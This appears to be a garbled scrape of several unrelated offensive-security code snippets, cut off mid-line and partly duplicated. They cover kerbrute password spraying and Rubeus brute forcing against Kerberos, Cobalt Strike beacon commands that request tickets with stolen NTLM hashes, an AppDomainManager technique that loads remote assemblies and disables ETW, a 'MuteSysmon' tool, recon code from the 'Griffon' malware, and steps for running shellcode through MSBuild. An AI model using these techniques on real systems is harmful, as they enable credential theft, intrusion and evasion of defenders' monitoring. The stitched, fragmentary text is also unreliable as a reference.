With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#DISCLAIMER | |
#I'm not the original author of the script... | |
#Original git repo vanished | |
function String-to-ByteArray ($String) | |
{ | |
$ByteArray=@() | |
For ( $i = 0; $i -lt ($String.Length/2); $i++ ) | |
{ | |
$Chars=$String.Substring($i*2,2) |
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" > | |
<Target Name="Hello" > | |
<!-- Call ANY .NET API --> | |
<!-- | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause | |
@echo off | |
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
REM °² Enumerates all files extensions ²° | |
REM °² and what opens them on Windows 10 in batch/cmd ²° | |
REM °² twitter: @ollieatnccgroup ²° | |
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
REM ------------------------------------------------------ | |
REM |
using System; | |
using System.Collections.Generic; | |
using System.Diagnostics; | |
using System.IO; | |
using System.Linq; | |
using System.Text; | |
namespace MuteSysmon | |
{ | |
class Program |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
This is a variation of the technique originally discovered by subtee
and described here
TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly>
element pointing to a specially crafted .NET assembly which executes when the application is loaded.
This variation allows you to load the AppDomainManager
assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable>
element :)
C:\Test
. Lets use aspnet_compiler.exe
as an exampletest.cs
to test.dll
with a signed strong name, this is required to load an assembly outside of a .NET applications base directory.test.dll
on a remote SMB or HTTP(S) server##### IF ELEVATED: | |
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X) | |
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH | |
# decode the base64 blob to a binary .kirbi | |
$ base64 -d ticket.b64 > ticket.kirbi | |
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT) | |
beacon> make_token DOMAIN\USER PassWordDoesntMatter |
Dim dnsname | |
dnsname= "canary.troubleshootdomain.com" | |
Set wmi = GetObject("winmgmts:") | |
Set response = wmi.ExecQuery("Select * from Win32_PingStatus WHERE address='" & dnsname & "'") |
'' Griffon main actions start here. | |
Set file_system_object = CreateObject("Scripting.FileSystemObject") | |
temp_file_name = file_system_object.GetSpecialFolder(2) & "\" & file_system_object.GetTempName | |
' Start the detailed recon. | |
recon_info_str = get_network_adapter_info | |
network_info_str = "" | |
recon_info_str = recon_info_str & "SystemInfo" & "=" & get_system_info() & "&" | |
recon_info_str = recon_info_str & "SoftwareInfo" & "=" & get_product_or_process_info("Win32_Product") & "&" |
1. Open PowerShell
2. Set MSbuild GodMode Env Variable
$env:MSBUILDENABLEALLPROPERTYFUNCTIONS = 1
3. Execute C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe msbuild.png.xml
Note: This "Serves" Shellcode in a memory mapped file.
This is no accessible to other processes.
Change in line 62 in shellcode.cs . Manual offsets just to troll you. :)
I leave this for you to explore